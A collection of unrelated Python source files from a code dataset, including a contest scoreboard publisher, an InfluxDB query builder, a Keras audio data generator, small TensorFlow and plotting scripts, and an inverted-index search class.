            if chmod:
                chmod = False
        else:
            log("Scoreboard hasn't changed. Not uploading")
        if freeze_at is not None:
            td = freeze_at - datetime.now()
            tds = td.total_seconds()
            if tds < 0:
                # Freeze time reached: stop polling.
                break
            if tds < (FREEZE_WARNING_MINUTES * 60):
                log("ATTENTION: The scoreboard will be frozen in %s" % td_str(td))
        time.sleep(interval)
def freeze_ewteam(sftp, scoreboard_url, freeze_message):
    """Freeze the EWTeam PHP scoreboard on the remote server.

    Backs up Team/iScoreBoard.php to Team/iScoreBoard.txt, fetches the
    currently rendered scoreboard over HTTP, injects the freeze banner after
    the <body> tag, and overwrites the PHP file with that static snapshot.
    Returns False on any failure. Refuses to re-freeze if a backup already
    exists.

    NOTE(review): the success path falls through returning None (all failure
    paths return False); callers don't check the result, but an explicit
    `return True` was probably intended.
    """
    scoreboard_file = "./Team/iScoreBoard.php"
    scoreboard_file_backup = "./Team/iScoreBoard.txt"
    try:
        sftp.stat(scoreboard_file)
    except IOError, ioe:
        log("EWTeam server doesn't seem to contain EWTeam (%s not found)" % (scoreboard_file))
        return False
    # A backup on disk means the scoreboard is already frozen.
    try:
        sftp.stat(scoreboard_file_backup)
        log("The EWTeam scoreboard is already frozen. You cannot re-freeze it.")
        return False
    except IOError, ioe:
        pass
    try:
        backupf = sftp.open(scoreboard_file_backup, "w")
        sftp.getfo(scoreboard_file, backupf)
        backupf.close()
    except Exception, e:
        log("Could not create backup of scoreboard file")
        return False
    # Fetch the rendered scoreboard over HTTP.
    if scoreboard_url[-1] != "/":
        scoreboard_url += "/"
    scoreboard_url = scoreboard_url + "Team/iScoreBoard.php"
    try:
        sb = urllib2.urlopen(scoreboard_url)
    except urllib2.HTTPError, he:
        log("EWTeam scoreboard not found.")
        log("%s produced error %s %s" % (scoreboard_url, he.code, he.msg))
        return False
    except Exception, e:
        log("Unexpected exception accessing scoreboard.")
        return False
    frozen_text = "<p style='font: bold 18px Arial, Sans-serif; color: red'>%s</p>\r\n" % freeze_message
    frozen_text += "<p style='font: 12px Arial, Sans-serif'>Scoreboard was frozen at %s (Central time)</p>" % now_str()
    sb_src = sb.read()
    # Inject the banner right after the opening <body> tag.
    sb_src = re.sub("body>\s*<table", "body>\r\n%s\r\n<table" % frozen_text, sb_src)
    try:
        sbf = sftp.open(scoreboard_file, "w")
        sbf.write(sb_src)
        sbf.close()
    except Exception, e:
        log("Could not write frozen scoreboard")
        return False
    log("Froze EWTeam scoreboard")
def thaw_ewteam(sftp):
    """Undo freeze_ewteam(): restore the PHP scoreboard from its backup.

    Copies Team/iScoreBoard.txt back over Team/iScoreBoard.php and deletes
    the backup. Returns False on any failure.
    """
    scoreboard_file = "./Team/iScoreBoard.php"
    scoreboard_file_backup = "./Team/iScoreBoard.txt"
    try:
        sftp.stat(scoreboard_file)
    except IOError, ioe:
        log("EWTeam server doesn't seem to contain EWTeam (%s not found)" % (scoreboard_file))
        return False
    try:
        sftp.stat(scoreboard_file_backup)
    except IOError, ioe:
        # NOTE(review): this message interpolates scoreboard_file, not
        # scoreboard_file_backup, so it names the wrong file.
        log("EWTeam server doesn't seem to contain a backup of the scoreboard PHP file (%s not found)" % (scoreboard_file))
        return False
    try:
        sbf = sftp.open(scoreboard_file, "w")
        sftp.getfo(scoreboard_file_backup, sbf)
        sbf.close()
    except Exception, e:
        log("Could not restore backup of scoreboard file")
        return False
    try:
        sftp.remove(scoreboard_file_backup)
    except Exception, e:
        log("Could not delete backup of scoreboard PHP")
        return False
    log("Thawed EWTeam scoreboard")
### MAIN PROGRAM ###
if __name__ == "__main__":
    # Setup argument parser
    parser = ArgumentParser(description="scoreboard-publish")
    parser.add_argument('config', metavar='CONFIG_FILE', type=FileType('r'))
    parser.add_argument('--freeze', action="store_true")
    parser.add_argument('--thaw-ewteam', action="store_true")
    parser.add_argument('--suffix', metavar='SUFFIX', type=str, default=None)
    parser.add_argument('--update', metavar='SECONDS', type=int, default=0)
    parser.add_argument('--freeze-at', metavar='DATE_TIME', type=str, default=None)
    parser.add_argument('--freeze-suffix', metavar='SUFFIX', type=str, default=None)
    parser.add_argument('--verbose', action="store_true")
    args = parser.parse_args()
    if args.verbose:
        verbose = True
    # Parse the YAML configuration file.
    try:
        config = yaml.load(args.config.read())
    except Exception, e:
        print "ERROR: Could not read configuration file"
        if verbose: raise
        exit(1)
    # Validate config and open the SSH/SFTP connections.
    ssh_web, sftp_web, ssh_ewteam, sftp_ewteam = load_config_file(config)
    if args.thaw_ewteam and sftp_ewteam is None:
        print "ERROR: --thaw-ewteam specified but no EWTeam server specified in configuration file"
        exit(1)
    scoreboard_files = [(config["pc2_dir"], f) for f in config["scoreboard_files"]]
    if args.update == 0:
        # One-shot mode: upload once (optionally frozen) and exit.
        if args.freeze_at:
            print "ERROR: Cannot use --freeze-at without --update"
            exit(1)
        upload_scoreboard(sftp_client = sftp_web,
                          files = scoreboard_files,
                          freeze = args.freeze,
                          freeze_message = config["freeze_message"],
                          suffix = args.suffix,
                          chmod = True)
        if args.freeze and sftp_ewteam is not None:
            freeze_ewteam(sftp_ewteam, config["ewteam_scoreboard_url"], config["freeze_message"])
        if args.thaw_ewteam:
            thaw_ewteam(sftp_ewteam)
    elif args.update >= MIN_UPDATE_INTERVAL:
        # Continuous mode: re-upload every --update seconds.
        if args.freeze:
            print "ERROR: Cannot use --freeze with --update"
            exit(1)
        if args.suffix is not None and args.freeze_at is not None:
            print "ERROR: Cannot use --freeze-at with --suffix"
            exit(1)
        if args.thaw_ewteam:
            print "ERROR: Cannot use --thaw-ewteam with --update"
            exit(1)
        if args.freeze_at is not None:
            try:
                freeze_at = datetime.strptime(args.freeze_at, "%Y-%m-%d %H:%M")
            except ValueError, ve:
                # NOTE(review): this format string has no % operand, so it
                # prints a literal '%s' instead of the offending date.
                print "ERROR: Invalid date %s (should be YYYY-MM-DD HH:MM)"
                exit(1)
            if freeze_at < datetime.now():
                print "ERROR: You have specified a freezing time that has already passed"
                exit(1)
            log("The scoreboard will be frozen at %s (in %s)" % (args.freeze_at, td_str(freeze_at - datetime.now())))
        else:
            freeze_at = None
        # Poll/upload until the freeze time (or forever if none was given).
        upload_scoreboard_every(sftp_client = sftp_web,
                                files = scoreboard_files,
                                suffix = args.suffix,
                                freeze_at = freeze_at,
                                interval = args.update)
        if freeze_at is not None:
            # Freeze the scoreboard
            log("Uploading frozen scoreboard")
            upload_scoreboard(sftp_client = sftp_web,
                              files = scoreboard_files,
                              freeze = True,
                              freeze_message = config["freeze_message"],
                              suffix = None,
                              chmod = False)
            if sftp_ewteam is not None:
                freeze_ewteam(sftp_ewteam, config["ewteam_scoreboard_url"], config["freeze_message"])
            if args.freeze_suffix is not None:
                # Keep publishing post-freeze results under a separate suffix.
                log("Beginning upload to post-freeze suffix (%s)" % args.freeze_suffix)
                upload_scoreboard_every(sftp_client = sftp_web,
                                        files = scoreboard_files,
                                        suffix = args.freeze_suffix,
                                        freeze_at = None,
                                        interval = args.update)
    else:
        print "ERROR: Update interval must be at least %i seconds" % MIN_UPDATE_INTERVAL
        exit(1)
| true |
ff747d97e8ac35c4b6d43513f01ceec88cbc8ced | Python | hpcloud-mon/monasca_query_language | /mql/influx_repo.py | UTF-8 | 3,897 | 2.515625 | 3 | [
"Apache-2.0"
] | permissive | import datetime
import sys
import numpy
from influxdb import client
import mql_parser
# Module-level InfluxDB connection.
# NOTE(review): host/port/credentials/database are hard-coded -- fine for a
# dev environment, but should come from configuration in production.
influxdb_client = client.InfluxDBClient(
    "192.168.10.6", "8086",
    "", "",
    "mon")
# Mapping from MQL aggregate names to their InfluxDB function equivalents.
functions_for_repo = {
    'avg': 'mean',
    'max': 'max',
    'min': 'min',
    'count': 'count',
    'sum': 'sum',
    'rate': 'derivative'
}
# class Range(object):
# def __init__(self, name, dimensions, values):
# self.name = name
# self.dimensions = dimensions
# self.values = values
#
#
# class Vector(object):
# def __init__(self):
# pass
def get_function(function):
    """Map an MQL aggregate name to its InfluxDB equivalent, or None if unknown."""
    # dict.get already returns None for missing keys, replacing the original
    # membership test followed by a second lookup.
    return functions_for_repo.get(function)
def _double_quote(string):
    """Wrap *string* in double quotes (InfluxDB identifier quoting)."""
    return ''.join(['"', string, '"'])
def _single_quote(string):
    """Wrap *string* in single quotes (InfluxDB string-literal quoting)."""
    return ''.join(["'", string, "'"])
def query(name, dimensions, function=None, start_time=None, end_time=None, group_by=None,
          bucket_size=None):
    """Build an InfluxQL SELECT, run it, and return the parsed results.

    Parameters:
        name: metric (measurement) name; None matches all via the /.*/ regex.
        dimensions: iterable of objects with .key/.operator/.value used to
            build the WHERE clause (regex operators keep the value unquoted).
        function: optional aggregate to apply to `value`; the special name
            'last_force' becomes 'last' with LIMIT 1 and no time bucketing.
        start_time/end_time: optional datetimes bounding the time range.
        group_by: optional list of GROUP BY terms.
            NOTE(review): when bucket_size applies, the caller's list is
            mutated in place via append().
        bucket_size: time-bucket width in seconds for aggregated queries.

    Returns: the output of parse_influx_results() for the executed query.
    """
    base_query = "Select {value} from \"{metric_name}\" " \
                 "{where_clause} " \
                 "{group_by} {limit}"
    # handle name is missing (if name is in dimensions, this will be overwritten below)
    if name is not None:
        metric_name = name
    else:
        metric_name = '/.*/'
    # create where clauses
    where_clauses = []
    if dimensions is not None:
        for dim in dimensions:
            clause = _double_quote(dim.key) + dim.operator
            if '~' in dim.operator:
                # Regex match: the value is itself a /regex/ and stays unquoted.
                clause += dim.value
            else:
                clause += _single_quote(dim.value)
            where_clauses.append(clause)
    # if there is no range on a metric, we will collect only the last value
    limit = None
    if function == 'last_force':
        function = 'last'
        bucket_size = None
        limit = 1
    # add bucket size to group_by if exists
    if function is not None and bucket_size is not None:
        time_str = 'time(' + str(bucket_size) + 's)'
        if isinstance(group_by, list):
            group_by.append(time_str)
        else:
            group_by = [time_str]
    # Time-range bounds (ISO timestamps, explicitly marked as UTC with 'Z').
    if start_time is not None:
        where_clauses.append('time >= \'' + start_time.isoformat() + 'Z\'')
    if end_time is not None:
        where_clauses.append('time <= \'' + end_time.isoformat() + 'Z\'')
    final_query = base_query.format(
        value=function + '(value) as value' if function is not None else 'value',
        metric_name=metric_name,
        where_clause=' where ' + " and ".join(where_clauses) if where_clauses else "",
        group_by=' group by ' + ','.join(group_by) if group_by is not None else "",
        limit=" limit " + str(limit) if limit is not None else ""
    )
    print(final_query)
    return parse_influx_results(influxdb_client.query(final_query, epoch='ms'))
def parse_influx_results(influx_data):
    """Convert an InfluxDB result mapping into a list of (key, record array).

    Each series is turned into a numpy record array of (time, value) pairs;
    points whose 'value' is None (gaps in aggregated series) are dropped.
    """
    results = []
    for key, series in influx_data.items():
        # Use the series yielded by items() directly instead of re-indexing
        # influx_data[key] a second time. (The original also built a
        # `definitions` dict that was never read; it has been removed.)
        time_series = [(point['time'], point['value'])
                       for point in series
                       if point['value'] is not None]
        results.append((key, numpy.rec.array(time_series)))
    return results
def main():
    """Exercise query() with a few representative MQL queries (manual smoke test)."""
    # Fixed window start so the runs are reproducible against recorded data.
    data_start_time = datetime.datetime.strptime("2017-01-23T16:00:00.000Z", '%Y-%m-%dT%H:%M:%S.%fZ')
    # Plain metric query with no dimensions or time range.
    query("cpu.idle_perc", None)
    # Dimension-only query across all metrics.
    query(None, [mql_parser.Dimension(['hostname', '=', 'devstack'])])
    # Time-bounded raw query.
    query("cpu.idle_perc", None,
          start_time=data_start_time,
          end_time=data_start_time + datetime.timedelta(minutes=5))
    # Aggregated query with 60-second buckets.
    query("cpu.idle_perc", None,
          function='last',
          start_time=data_start_time,
          end_time=data_start_time + datetime.timedelta(minutes=5),
          bucket_size='60s')


if __name__ == '__main__':
    sys.exit(main())
| true |
3baf987cd1be64f1e8b5485141022e396003ea1c | Python | PTITLab/Multitask-Breath-Sound | /Breath-Code/dataset.py | UTF-8 | 3,505 | 2.890625 | 3 | [] | no_license | import numpy as np
import keras
from scipy.io import wavfile
import librosa
import os
from keras.utils import to_categorical
class BreathDataGenerator(keras.utils.Sequence):
    """Keras Sequence that yields batches of MFCC features from WAV files.

    Expects *directory* to contain one sub-directory per label listed in
    *list_labels*; every file inside a matching sub-directory is treated as
    a WAV sample of that class.
    """
    def __init__(self, directory,
                 list_labels=['normal', 'deep', 'strong'],
                 batch_size=32,
                 dim=None,
                 classes=None,
                 shuffle=True):
        """Scan *directory* for samples and prepare the first epoch.

        NOTE(review): `list_labels` is a mutable default argument (shared
        across instances if ever mutated), and the `classes` parameter is
        ignored -- self.classes is overwritten with len(list_labels) below.
        """
        self.directory = directory
        self.list_labels = list_labels
        # Target (rows, cols) shape each MFCC feature matrix is resized to.
        self.dim = dim
        self.__flow_from_directory(self.directory)
        self.batch_size = batch_size
        self.classes = len(self.list_labels)
        self.shuffle = shuffle
        self.on_epoch_end()
    def __len__(self):
        """Number of full batches per epoch (remainder samples are dropped)."""
        return int(np.floor(len(self.wavs) / self.batch_size))
    def __getitem__(self, index):
        """Return batch *index* as (features, one-hot labels)."""
        # print("In get Item!!")
        # 'Generate one batch of data'
        # Slice this batch's sample indices out of the (possibly shuffled) order.
        indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]
        # Resolve indices to file paths and label ids.
        rawX = [self.wavs[k] for k in indexes]
        rawY = [self.labels[k] for k in indexes]
        # Load and featurize the batch.
        X, Y = self.__feature_extraction(rawX, rawY)
        # print("Done getting data")
        return X, Y
    def __flow_from_directory(self, directory):
        """Collect (file path, label id) pairs from labeled sub-directories."""
        self.wavs = []
        self.labels = []
        # NOTE: `dir` and `file` shadow Python builtins (kept unchanged here).
        for dir in os.listdir(directory):
            sub_dir = os.path.join(directory, dir)
            if os.path.isdir(sub_dir) and dir in self.list_labels:
                label = self.list_labels.index(dir)
                for file in os.listdir(sub_dir):
                    self.wavs.append(os.path.join(sub_dir, file))
                    self.labels.append(label)
    def on_epoch_end(self):
        """Rebuild (and optionally shuffle) the sample ordering for the next epoch."""
        self.indexes = np.arange(len(self.wavs))
        if self.shuffle == True:
            np.random.shuffle(self.indexes)
    def __feature_extraction(self, list_wav, list_label):
        # print("Go to feature extraction!!!")
        'Generates data containing batch_size samples'
        X = []
        Y = []
        for i in range(self.batch_size):
            # Original author flagged this read as fragile ("#bug in here"):
            # wavfile.read can raise for non-WAV or malformed files.
            rate, data = wavfile.read(list_wav[i]) #bug in here
            # print("End")
            data = np.array(data, dtype=np.float32)
            # Normalize to [-1, 1]; assumes 16-bit PCM input -- TODO confirm.
            data *= 1./32768
            # feature = librosa.feature.melspectrogram(y=data, sr=rate, n_fft=2048, hop_length=512, power=2.0)
            feature = librosa.feature.mfcc(y=data, sr=rate,
                                           n_mfcc=40, fmin=0, fmax=8000,
                                           n_fft=int(16*64), hop_length=int(16*32), power=2.0)
            # Force every sample to the fixed self.dim shape expected by the model.
            feature = np.resize(feature, self.dim)
            category_label = to_categorical(list_label[i], num_classes= len(self.list_labels) )
            X.append(feature)
            Y.append(category_label)
        X = np.array(X, dtype=np.float32)
        Y = np.array(Y, dtype=int)
        return X, Y
# train_generator = BreathDataGenerator(
# 'D:/Do An/breath-deep/data/datawav_filter/train',
# list_labels=LIST_LABELS,
# batch_size=BATCH_SIZE,
# dim=INPUT_SIZE,
# shuffle=False)
# X, Y = train_generator.__getitem__(3)
# rate, data = wavfile.read("D:/Do An/breath-deep/data/datawav_filter/deep/01_male_23_BQuyen_1230_1270.wav")
# print(data) | true |
bee776a208bb4cfb0466fbbba5149af9bebd37a6 | Python | dorx/codesnippetsearch | /code_search/vocabulary.py | UTF-8 | 1,539 | 3.09375 | 3 | [
"MIT"
] | permissive | from typing import List, Dict, Counter as TypingCounter, Optional, Iterator
from collections import Counter
MASK_TOKEN = '%MASK%'
UNKNOWN_TOKEN = '%UNK%'


class Vocabulary:
    """Bidirectional token<->id mapping with two reserved tokens.

    Id 0 is the mask token and id 1 the unknown token; every other token
    receives the next free id in insertion order.
    """

    def __init__(self):
        # token -> id and id -> token are kept in lockstep
        self.token_to_id: Dict[str, int] = {MASK_TOKEN: 0, UNKNOWN_TOKEN: 1}
        self.id_to_token: List[str] = [MASK_TOKEN, UNKNOWN_TOKEN]

    def add_token(self, token: str):
        """Register *token* if unseen; a known token keeps its id."""
        if token in self.token_to_id:
            return
        self.token_to_id[token] = len(self.id_to_token)
        self.id_to_token.append(token)

    def get_token_id(self, token: str) -> int:
        """Return the token's id, or the unknown-token id for unseen tokens.

        Annotated ``int`` (was ``Optional[int]``): the unknown-token
        fallback means this can never return None.
        """
        return self.token_to_id.get(token, self.token_to_id[UNKNOWN_TOKEN])

    def add_tokens(self, tokens: TypingCounter[str], vocabulary_size: int, count_threshold: int):
        """Add up to *vocabulary_size* most common tokens whose count
        reaches *count_threshold*.

        Relies on ``Counter.most_common`` yielding counts in descending
        order, so iteration stops at the first token below the threshold.
        """
        for token, count in tokens.most_common(vocabulary_size):
            if count < count_threshold:
                break
            self.add_token(token)

    @property
    def size(self):
        """Number of known tokens, including the two reserved ones."""
        return len(self.id_to_token)

    @staticmethod
    def create_vocabulary(tokens: Iterator[str], ignored_tokens=None,
                          vocabulary_size: int = 10000, count_threshold: int = 10):
        """Build a Vocabulary from a token stream, skipping *ignored_tokens*.

        (The original condition redundantly re-tested ``ignored_tokens``;
        simplified to an equivalent form.)
        """
        counter = Counter(token for token in tokens
                          if not ignored_tokens or token not in ignored_tokens)
        vocabulary = Vocabulary()
        vocabulary.add_tokens(counter, vocabulary_size, count_threshold)
        return vocabulary
| true |
8b55d761ffb598b3a0cd40930860efca84d7e917 | Python | dr-dos-ok/Code_Jam_Webscraper | /solutions_python/Problem_200/3538.py | UTF-8 | 1,434 | 2.859375 | 3 | [] | no_license | #f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/input2', 'r')
# C:\Users\Avinash\Desktop\Google codejam 2017\pycharmworks\AA-small-practice.in
# f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/A-large-practice.in', 'r')
# Google Code Jam 2017 "Tidy Numbers": for each input number, find the largest
# number <= it whose digits are non-decreasing, by scanning digit pairs and
# turning any "descent" into (digit-1) followed by all 9s.
f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/B-small-attempt0.in', 'r')
data = f.readlines()
f.close()
f = open('tidy2', 'w')
t = data[0]  # first line = number of test cases (read but unused)
y = 0  # 1-based test-case counter
for i in data[1:]:
    y += 1
    number = int(i)
    stringnumber = str(number)
    string1 = ""
    for j in range(len(stringnumber) - 1):
        ten = int(stringnumber[j])
        # strict descent: lower this digit by one, fill the rest with 9s
        if stringnumber[j] > stringnumber[j + 1]:
            string1 = str(ten - 1)
            for k in range(j, len(stringnumber) - 1):
                string1 += "9"
            stringnumber = stringnumber[:j] + string1
        # equal digits: look further right for any smaller digit
        if stringnumber[j] == stringnumber[j + 1]:
            try:
                # NOTE(review): bare except presumably guards the index
                # lookups after stringnumber shrinks mid-loop — confirm
                for k in range(j, len(stringnumber)):
                    if stringnumber[j] > stringnumber[k]:
                        string1 = str(ten - 1)
                        for x in range(j, len(stringnumber) - 1):
                            string1 += "9"
                        stringnumber = stringnumber[:j] + string1
            except:
                continue
        count = (int(stringnumber))
    print(count)
    print("Case #" + str(y) + ": " + str(count), file=f)
f.close()
| true |
10fc9b2d7e508e3e467f4375f6b478f345decde7 | Python | gagejustins/snql | /snql/app/data_scripts/data_api.py | UTF-8 | 1,103 | 2.515625 | 3 | [] | no_license | import pandas as pd
def generate_pairs_owned_over_time_df(conn):
    """Return a DataFrame (date, num_owned): pairs of sneakers owned per month.

    For every month in calendar_monthly up to the current month, counts the
    sneakers acquired before that month and not yet sold, trashed or given
    away. The SQL uses Postgres functions (date_trunc, now()), so *conn* is
    assumed to be a Postgres connection.

    Fixes: the cursor is now closed, and the unreachable
    ``if df is None: return "generation failed"`` branch was removed
    (``pd.DataFrame(...)`` never returns None — it returns or raises).
    """
    sql = """select
    c.month,
    count(*) as pairs_owned
    from calendar_monthly c
    join dim_sneakers s on s.created_at <= c.month
    and (sold_at >= c.month or sold_at is null)
    and (trashed_at >= c.month or trashed_at is null)
    and (given_at >= c.month or given_at is null)
    and c.month <= date_trunc('month', now())
    group by 1
    order by 1"""
    cursor = conn.cursor()
    try:
        cursor.execute(sql)
        results = cursor.fetchall()
    finally:
        cursor.close()  # was leaked in the original
    return pd.DataFrame(results, columns=['date', 'num_owned'])
def generate_pairs_per_brand_df(conn):
    """Return a DataFrame (brand, num_owned): owned pairs per manufacturer,
    sorted by count descending.

    Fixes: the cursor is now closed, and the unreachable
    ``if df is None: return "generation failed"`` branch was removed
    (``pd.DataFrame(...)`` never returns None — it returns or raises).
    """
    sql = """select
    manufacturer_name,
    count(*)
    from dim_sneakers
    where is_owned = true
    group by 1
    order by 2 desc"""
    cursor = conn.cursor()
    try:
        cursor.execute(sql)
        results = cursor.fetchall()
    finally:
        cursor.close()  # was leaked in the original
    return pd.DataFrame(results, columns=['brand', 'num_owned'])
| true |
1239fe53f1e1b6f81fa4bbf5e2cb2fcbd8cb2c4a | Python | nextwiggin4/TimeRisk | /dice_test.py | UTF-8 | 219 | 3.515625 | 4 | [] | no_license | from dice import *
d1 = Dice()
# simple REPL: 'n' shows the next roll, anything else is parsed as a turn
# number whose roll (plus the running roll count) is reported
while True:
    turn = input("please select a trun to check: ")
    if turn == 'n':
        print(d1.next_roll())
        continue
    print(d1.roll_for_turn(int(turn)))
    print(d1.number_of_rols())
| true |
7eeddaa8459d741a5792749effdd1090ef781f3c | Python | linxigal/tfos | /tfos/tf/models/mlp.py | UTF-8 | 2,240 | 2.859375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
:Author : weijinlong
:Time :
:File :
"""
import tensorflow as tf
from tfos.tf import TFModel, TFCompile
class MLPModel(TFModel):
    # One-hidden-layer MLP graph (input -> ReLU hidden + dropout -> 10-way
    # softmax), built with the TF1 placeholder/Variable API on top of the
    # project's TFModel base class.
    def __init__(self, input_dim=784, hidden_units=300, keep_prob=0.8):
        """
        :param input_dim: number of input nodes
        :param hidden_units: number of hidden-layer nodes
        :param keep_prob: dropout keep probability
        """
        super(MLPModel, self).__init__()
        self.input_dim = input_dim
        self.hidden_units = hidden_units
        self.add_params(keep_prob=keep_prob)
    def build_model(self):
        # in_units = 784  -- number of input nodes
        # h1_units = 300  -- number of hidden-layer nodes
        # Hidden-layer weights W1: truncated normal, mean 0, stddev 0.1.
        w1 = tf.Variable(tf.truncated_normal([self.input_dim, self.hidden_units], stddev=0.1))
        b1 = tf.Variable(tf.zeros([self.hidden_units]))  # hidden bias b1 initialized to zeros
        w2 = tf.Variable(tf.zeros([self.hidden_units, 10]))
        b2 = tf.Variable(tf.zeros([10]))
        x = tf.placeholder(tf.float32, [None, self.input_dim])
        keep_prob = tf.placeholder(tf.float32)  # dropout keep probability
        # Model structure: ReLU hidden layer, dropout, softmax output.
        hidden1 = tf.nn.relu(tf.matmul(x, w1) + b1)
        hidden1_drop = tf.nn.dropout(hidden1, rate=1 - keep_prob)
        y = tf.nn.softmax(tf.matmul(hidden1_drop, w2) + b2)
        self.add_inputs(x=x, keep_prob=keep_prob)
        self.add_outputs(y=y)
        return self
class MLPCompile(TFCompile):
    # Attaches the TF1 training ops (cross-entropy loss, Adagrad step,
    # accuracy metric and scalar summaries) to a graph built by MLPModel.
    def compile(self):
        # Training part.
        # y = self.outputs_list()[0]
        y = self.outputs['y']
        y_ = tf.placeholder(tf.float32, [None, 10])
        cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), 1))
        train_op = tf.train.AdagradOptimizer(0.3).minimize(cross_entropy)
        # NOTE(review): tf.arg_max is the deprecated alias of tf.argmax
        correct_prediction = tf.equal(tf.arg_max(y, 1), tf.arg_max(y_, 1))
        accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
        tf.summary.scalar('accuracy', accuracy)
        tf.summary.scalar('loss', cross_entropy)
        self.add_inputs(y=y_)
        self.add_metrics(train_op=train_op, loss=cross_entropy, accuracy=accuracy)
        return self
| true |
074d56aa9fe8379f522d8d129cefc81cb4a2a805 | Python | michalporeba/cooking-with-python | /steps/step01/recipes.py | UTF-8 | 1,271 | 4.15625 | 4 | [
"MIT"
] | permissive | # the data - for now hardcoded three recipes
recipes = [
{ "name": "lemon cake", "description": "a cake with a lemon"},
{ "name": "brownies", "description": "a simple cake with chocolate"},
{ "name": "cookie"} # there is no description, so we can test this behaviour
]
def display_recipes():
print("Available recipes:")
for i, recipe in enumerate(recipes):
print(f"\t{i+1} - {recipe['name']}")
def get_users_choice(number_of_recipes) -> int:
    """Prompt until the user enters a valid recipe number.

    Returns the chosen 1-based number, or None when the user presses
    enter on an empty line (meaning: quit).
    """
    while True:
        print("\n(choose recipe number, or press enter to exit)")
        answer = input("which recipe would you like to see?\n")
        if not answer:
            return None
        if answer.isdigit() and 0 < int(answer) <= number_of_recipes:
            return int(answer)
        print(f"The number must be between 1 and {number_of_recipes}!")
def display_recipe(recipe):
    """Print one recipe's name and description, with fallbacks for gaps."""
    name = recipe.get('name', 'UNKNOWN')
    description = recipe.get('description', 'NO DESCRIPTION')
    print(f"\n{name}: {description}")
# the main application loop. keep going until it is time to end
while True:
    display_recipes()
    selection = get_users_choice(len(recipes))
    if not selection:  # empty input -> the user wants to quit
        break
    display_recipe(recipes[selection - 1])
    print("\n\nLet's try again!\n")
| true |
a7fbce000908fdfbc6bf8dc9a80780b5668698a7 | Python | pps789/introduction-to-deep-learning-2018 | /hw1/q3-3.py | UTF-8 | 775 | 3.125 | 3 | [] | no_license | import numpy as np
import matplotlib
import math
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def inv_F(y):
    """Inverse CDF of Exp(1): maps u in [0, 1) to a sample value."""
    return -math.log(1.0 - y)
def F(x):
    """CDF of the Exp(1) distribution."""
    return 1.0 - math.exp(-x)
N = 1000000
# samples: draw N uniforms and map them through the inverse CDF
# (inverse-transform sampling for the Exp(1) distribution)
data = np.random.uniform(0, 1, N)
samples = list(map(inv_F, data))
# fix: np.histogram's `normed` argument was deprecated and then removed
# (NumPy >= 1.24); `density=True` is the equivalent for equal-width bins
H_sample, X_sample = np.histogram(samples, bins=500, density=True)
dx_sample = X_sample[1] - X_sample[0]
C_sample = np.cumsum(H_sample) * dx_sample  # empirical CDF from the density
plt.bar(X_sample[1:], C_sample, label='samples', width=np.diff(X_sample), linewidth=0)
# exact values: analytic CDF on a fine grid for comparison
X_exacts = np.arange(0, X_sample[-1], 0.001)
Y_exacts = list(map(F, X_exacts))
plt.plot(X_exacts, Y_exacts, label='exacts', color='red')
plt.legend(loc='lower right')
plt.xlabel('value of X')
plt.ylabel('probability')
plt.savefig('q3-3.png')
| true |
33c165db6d4daeba6c1340cabb6f84dfaed52d06 | Python | remy-algo-dim/AD_serveur | /src/google_filters_to_good_format.py | UTF-8 | 590 | 2.78125 | 3 | [] | no_license | import pandas as pd
"""
Ce fichier a pour but de transformer le format des filtres que l'on telecharge depuis le drive (format CSV),
en bon format pour notre algo. On renseignera donc en input :
- CSV = path du csv telecharge depuis DRIVE
- NON_CLIENT = il s'agit du nom du client figurant dans la premiere colonne du CSV
- id_ = C'est l'id du client dans MYSQL
"""
CSV = ""
NOM_CLIENT = ""
id_ = ""
df = pd.read_csv(CSV)
df = df[df['Nom - Prénom - Nom société'] == NOM_CLIENT]
df.to_excel("/Users/remyadda/Desktop/AD/Projets/AD_serveur/src/premium/Config/filtres_"+str(id_)+".xlsx") | true |
215ace42f4865281b3df20b96fe77ba398df9aaa | Python | Wolvarun9295/PythonLibraries | /Seaborn/Swarm Plot/1.PlotOfBillvsSize.py | UTF-8 | 149 | 2.625 | 3 | [] | no_license | import seaborn as sns
import matplotlib.pyplot as plt
# load seaborn's built-in "tips" example dataset
tips = sns.load_dataset("tips")
# swarm plot: total bill on x, party size on y, one dot per table
sns.swarmplot(x='total_bill', y='size', data=tips)
plt.show()
| true |
bbe0302aa3aa7622696d2a36d0bd619a94c26357 | Python | LucasOJacintho/DESENVOLVIMENTO-PYTHON | /DESENVOLVIMENTO PYTHON/1014 - Consumo.py | UTF-8 | 101 | 3.0625 | 3 | [] | no_license | distancia=int(input(''))
combustivel=float(input(''))  # fuel used, in litres
print ("%.3f" % (distancia/combustivel),'km/l')  # efficiency, 3 decimal places
f09f7c467bdbfb83b79b41af2003d76057d9d0a3 | Python | HAOYU-LI/Web_Search_Application | /src/Inverted_ID.py | UTF-8 | 3,213 | 2.921875 | 3 | [] | no_license | import os
import re
import sys
import json
class Inverted_ID:
    """Inverted index over the 'subject' and 'author' fields of cvpr records.

    input:
        dic : dictionary mapping 'cvpr' to a list of paper dicts, e.g.
              {'cvpr': [{'subject': ..., 'title': ..., 'author': ...}, ...]}

    Each cleaned, lowercased word of the indexed fields is mapped to the
    set of record indices in which it occurs.
    """

    # punctuation stripped from every word before indexing / lookup
    # (compiled once instead of re-parsing the pattern per word)
    _CLEAN_PATTERN = re.compile(r'[/,#$.?!"<>();&-]')

    def __init__(self, dic):
        self.word_lst = dic['cvpr']
        self.inverted_idx = {}
        self._construct_idx()

    def _construct_idx(self):
        """Index the searchable fields of every record."""
        for i, record in enumerate(self.word_lst):
            if 'subject' in record:
                self._add(record['subject'], i)
            # 'pages' and 'year' are deliberately not indexed
            # (numeric words are dropped by _add anyway)
            if 'author' in record:
                self._add(record['author'], i)

    def _add(self, words, index):
        """Register every usable word of *words* under record *index*."""
        for word in str(words).split():
            word = self._CLEAN_PATTERN.sub('', word).lower()
            # pure numbers and single characters carry no search value
            if word.isdigit() or len(word) <= 1:
                continue
            self.inverted_idx.setdefault(word, set()).add(index)

    def search(self, words, vis = True):
        """Return indices of records matching ANY word of the query (union).

        (The original docstring claimed AND semantics; the implementation
        has always been a union over the query words.)

        input:
